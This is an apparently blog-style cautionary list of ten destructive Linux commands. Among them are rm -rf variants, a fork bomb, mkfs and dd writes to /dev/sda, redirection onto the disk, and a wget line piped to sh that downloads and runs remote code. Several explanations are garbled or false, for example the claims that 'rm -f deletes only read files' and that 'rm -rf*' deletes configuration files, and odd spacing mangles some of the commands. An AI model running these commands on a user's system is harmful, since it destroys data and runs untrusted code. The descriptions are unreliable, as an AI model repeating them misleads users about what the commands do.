Dangerous linux terminal commands

1-> rm -rf

This command is the fastest way to delete the folder and entire content in it. But when you make a mistake in typing it leads to the lot of loss.

-rm-rf- deletes all the files in the home folder.

rm -rf* delete all the configuration files

rm -rf* delete all the configuration files.

rm -f deletes only read files.

Rm -r deletes the folder recursively (even the empty folder)
2->  : () {: |: &} ;:

This command is known as Fork Bomb as it creates the new copies of itself. This replication process continues until it freezes. This is because of consumption of lot of memory of RAM.
3-> command> / dev / sda

This runs a command and sends the output of that directly to your hard drive and thereby crashing it. It replaces all the files on the block with raw data i.e writes raw data directly to hard drive.
4->  mv directory / dev / null

This command moves all the files to NULL i.e it deletes all the files. So, it finally destroys all the files.

5-> wget http://googleoranywebsite.com/something -O – | sh

wget command will download the script from the site and sh will run the script on your system. So be careful before running the script.
6-> Mkfs.ext3 / dev / sda

This command creates a new ext3 file system on the device. sda specifies a partition on the hard drive. It simply formats the block ‘sda’ and resets the hard drive. i.e it formats the default drive.
->7) > File

The above command releases the file content. But it results in lot of damage when there is a slight mistake in command.

“> xt.conf” will write the configuration file or any other system or configuration file.
#8. ^ foo ^ bar

This command edits the previous command by reducing the need to retype the entire command again. so, carefully check the change in the original command using ^ ^ foo bar command.
9) dd if=/dev/random of=/dev/sda

This command writes junk onto a hard drive. It performs copying of files from one place to another. /dev/sda transfers random data. This finally leaves your system inconsistent.
->10. Invisible command

This is similar to that of the first command rm -rf except that codes are hidden and running this code terminates and clears your partition.

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